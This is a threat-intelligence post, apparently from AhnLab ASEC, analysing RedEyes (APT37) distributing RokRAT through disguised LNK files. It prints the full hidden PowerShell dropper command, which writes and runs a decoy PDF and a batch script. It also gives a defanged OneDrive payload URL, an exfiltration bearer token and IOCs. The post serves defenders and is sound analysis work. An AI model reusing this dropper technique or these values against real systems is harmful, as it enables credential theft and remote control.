# RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft) **asec.ahnlab.com/en/51751/** By bghjmun April 26, 2023 AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which [distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT](https://asec.ahnlab.com/en/49089/) malware through LNK files. RokRAT is malware that is capable of collecting user credentials and downloading additional malware. The malware was once distributed through HWP and Word files. The LNK files that were discovered this time contain PowerShell commands that can perform malicious behavior by creating and executing a script file along with a normal file in the temp folder. The confirmed LNK filenames are as follows: 230407Infosheet.lnk April 29th 2023 Seminar.lnk 2023 Personal Evaluation.hwp.lnk NK Diplomat Dispatch Selection and Diplomatic Offices.lnk NK Diplomacy Policy Decision Process.lnk The “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command. ----- Figure 1. Properties of the LNK file The LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script codes. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A. Figure 2. Dummy data that exists at the end of the LNK file The PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows: /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -Match ‘Program Files’) { $dirPath = ‘%temp%’ }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = ‘%temp%\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = ‘%temp%\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select Skip 00561396)) -Encoding Byte; ^& $exePath; The LNK file is read up to 0x890F4 and is saved and executed with the filename “230407Infosheet.pdf” in the Temp folder while excluding the first 0x9AA. Afterward, it reads up to 0x89D9A of the LNK file and is saved and executed in the Temp folder with the filename “230412.bat” after excluding 0x890F4, which is the byte where the PDF data exists. ----- located at 0x9AA of the LNK file located at 0x890F4 of the LNK file in the Temp folder Figure 3. PDF data Figure 4. Script code Figure 5. Files created The threat actor executes a normal PDF file to make the behavior appear normal before carrying out their malicious behavior through the script file. ----- Figure 6. 230407Infosheet.pdf (normal file) The script file executed at the same time contains the following PowerShell command that executes malicious commands which exist as HEX values. Figure 7. 230412.bat The final PowerShell command that is executed downloads the encoded data from hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/roo decodes it, and injects it into the PowerShell process to perform malicious behavior. ----- PowerShell command that is executed file uploaded to OneDrive Figure 8. Final Figure 9. Malicious The injected data is the RokRAT malware that is capable of collecting user credentials and downloading additional malware. The collected information is sent to the threat actor’s cloud server using cloud services such as pcloud and yandex. The UserAgent in the request header is disguised as Googlebot. The certificate token used to send files is as follows: Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX The additional normal files executed through the malicious LNK are as follows: ----- 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk 230402.hwp created through NK Diplomacy Policy Decision Process.lnk Figure 10. April Figure 11. As RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are advised to take extra caution. [Reddoor (RokRAT) Malware Analysis Report – May 9, 2022](https://atip.ahnlab.com/ti/contents/issue-report/malware-analysis?i=4b8712d0-31e8-46c1-b6d7-0e1b32f94b60) [Korean APT Attacks Using Ruby Script Analysis Report – Apr. 7, 2021](https://atip.ahnlab.com/ti/contents/issue-report/malware-analysis?i=255948d4-3b27-4227-ae9a-542aa2eea545) ----- [ e etect o ] Dropper/LNK.Agent (2023.04.08.00) Downloader/BAT.Agent (2023.04.08.00) [IOC] 0f5eeb23d701a2b342fc15aa90d97ae0 (LNK) aa8ba9a029fa98b868be66b7d46e927b (LNK) 657fd7317ccde5a0e0c182a626951a9f (LNK) be32725e676d49eaa11ff51c61f18907 (LNK) 8fef5eb77e0a9ef2f97591d4d150a363 (bat) 461ce7d6c6062d1ae33895d1f44d98fb (bat) hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/ **Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis** **information.** [Categories:Malware Information](https://asec.ahnlab.com/en/category/malware-information-en/) [Tagged as:APT37,lnk,RedEyes,RokRAT,ScarCruft](https://asec.ahnlab.com/en/tag/apt37-en/) -----